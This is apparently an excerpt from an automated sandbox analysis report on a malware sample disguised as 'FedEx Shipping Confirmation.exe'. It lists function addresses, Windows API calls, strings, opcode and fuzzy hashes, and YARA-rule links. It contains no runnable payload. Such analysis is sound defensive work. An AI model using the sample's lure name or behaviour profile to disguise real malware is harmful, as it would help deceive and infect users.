Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A

Function 004044F5 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,004042CC), ref: 004044FF

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
Instruction ID: b0a400b6fcb01754b069d8f8c1c9044561b78d1e04efb9d0fff21555a903a89e
Opcode Fuzzy Hash: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
Instruction Fuzzy Hash: DFA00176444910ABDA02AB50EF0984ABB62FBE5701B519879A286510348B365820FB19

Non-executed Functions

Function 0040619A Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406335,?,?), ref: 004061D5
GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE

Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB

GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
wsprintfA.USER32 ref: 00406219
GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?), ref: 00406254
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406263
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040629B
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
GlobalFree.KERNEL32(00000000), ref: 00406302
CloseHandle.KERNEL32(00000000), ref: 00406309

Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\FedEx Shipping Confirmation.exe,80000000,00000003), ref: 00406048
Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040606A

Strings

[Rename], xrefs: 00406283, 00406295
Mz, xrefs: 004061C3
%ls=%ls, xrefs: 0040620F
Uz, xrefs: 004061F0

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$Mz$Uz
API String ID: 2171350718-3367237295
Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD

Function 00406802 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe",76173420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C), ref: 00406874
CharNextW.USER32(?,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe",76173420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
CharPrevW.USER32(?,?,76173420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
*?|<>/":, xrefs: 00406854
"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe", xrefs: 00406846

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2777420762
Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction ID: 8a5b279eb1c6e0cea376d4f623a12da6f674b8daf8575b9a92ef11e753d0d18b
Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
Instruction Fuzzy Hash: D111B66780121299DB303B158C44AB766E8EF54794F52C03FED8A732C0E77C4C9286AD

Function 0040453A Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404557
GetSysColor.USER32(00000000), ref: 00404595
SetTextColor.GDI32(?,00000000), ref: 004045A1
SetBkMode.GDI32(?,?), ref: 004045AD
GetSysColor.USER32(?), ref: 004045C0
SetBkColor.GDI32(?,?), ref: 004045D0
DeleteObject.GDI32(?), ref: 004045EA
CreateBrushIndirect.GDI32(?), ref: 004045F4

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction ID: 9e725ab64d6b149d2d2f876944178e70108deb967c5ff43b0f72f150d1bef9aa
Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
Instruction Fuzzy Hash: DA2177B1500704AFCB309F78DD18B5BBBF4BF41710B04892EEA96A22E0D739E944CB54

Function 00402FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FD6
MulDiv.KERNEL32(000B706C,00000064,000B7070), ref: 00403001
wsprintfW.USER32 ref: 00403011
SetWindowTextW.USER32(?,?), ref: 00403021
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033

Strings

verifying installer: %d%%, xrefs: 0040300B

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
Instruction ID: 52c7d57b2d50c4e26d0c42f1be749ca1a93388b8845742b28701603c77c86054
Opcode Fuzzy Hash: c24f39b73ea1f3b51e5f33cc7d94247a9242632f843dd5f1d8eee7270cd10b93
Instruction Fuzzy Hash: 89016270640209BBEF209F60DD4AFEE3B79EB04344F10803AFA02B51D0DBB99A559F58

Function 6ED22655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6ED212BB: GlobalAlloc.KERNEL32(00000040,?,6ED212DB,?,6ED2137F,00000019,6ED211CA,-000000A0), ref: 6ED212C5

GlobalFree.KERNEL32(?), ref: 6ED22743
GlobalFree.KERNEL32(00000000), ref: 6ED22778

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 985b8289718ff32d17aa617051c6fcf171d63738461e6391694a50d27aeded21
Instruction ID: 9d62ecf82d099c4a2a43b7648f867fc557fff0740cadc0343cdf135de48c699c
Opcode Fuzzy Hash: 985b8289718ff32d17aa617051c6fcf171d63738461e6391694a50d27aeded21
Instruction Fuzzy Hash: CD31BE71528501EFEF258FA4CE84C6A77BAFB8734D3144539F7419B220C731A84ADB62

Function 6ED22480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6ED225C2

Part of subcall function 6ED212CC: lstrcpynW.KERNEL32(00000000,?,6ED2137F,00000019,6ED211CA,-000000A0), ref: 6ED212DC

GlobalAlloc.KERNEL32(00000040), ref: 6ED22548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6ED22563

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 70dbd88234e675b3a209b94b7d01b697f924154458ec2b0f72f167753abcdef5
Instruction ID: 97ed213b4add78eae1fa4faffb5238d2b439bb67e4cfc55b7d6083d2b98f3985
Opcode Fuzzy Hash: 70dbd88234e675b3a209b94b7d01b697f924154458ec2b0f72f167753abcdef5
Instruction Fuzzy Hash: 8341CCB0418705DFE7149FA9D980A6677B8FBA631CF00893DFB868B580E731A546CB71

Function 6ED216BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6ED222D8,?,00000808), ref: 6ED216D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6ED222D8,?,00000808), ref: 6ED216DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6ED222D8,?,00000808), ref: 6ED216F0
GetProcAddress.KERNEL32(6ED222D8,00000000), ref: 6ED216F7
GlobalFree.KERNEL32(00000000), ref: 6ED21700

Memory Dump Source

Source File: 00000001.00000002.3344883399.000000006ED21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6ED20000, based on PE: true

Associated: 00000001.00000002.3344832397.000000006ED20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344933338.000000006ED24000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.3344985953.000000006ED26000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ed20000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 5e61d35305c810bc8f2b73cf546cfbac329e3ecea298cf9def5497ad43664edf
Instruction ID: 7d83ea0471bf3469939310adfe4a76bb090cb58cac56f4ebb72ae097efcae960
Opcode Fuzzy Hash: 5e61d35305c810bc8f2b73cf546cfbac329e3ecea298cf9def5497ad43664edf
Instruction Fuzzy Hash: B3F037721065387FDA2016A79D4CD9B7E9CDF8B2F5B110315F718D119085614C43D7F1

Function 00405F2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561

Part of subcall function 00405ECE: CharNextW.USER32(?,?,007A3F50,?,00405F42,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76173420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"), ref: 00405EDC
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9

lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76173420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FedEx Shipping Confirmation.exe"), ref: 00405F84
GetFileAttributesW.KERNEL32(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,?,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,76173420,C:\Users\user\AppData\Local\Temp\), ref: 00405F94

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2B
P?z, xrefs: 00405F31

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$P?z
API String ID: 3248276644-3222627218
Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E

Function 00405E23 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E33
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405E45

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23

Memory Dump Source

Source File: 00000001.00000002.3331024390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3330970519.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331063574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331107601.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3331676115.00000000007F1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_FedEx Shipping Confirmation.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
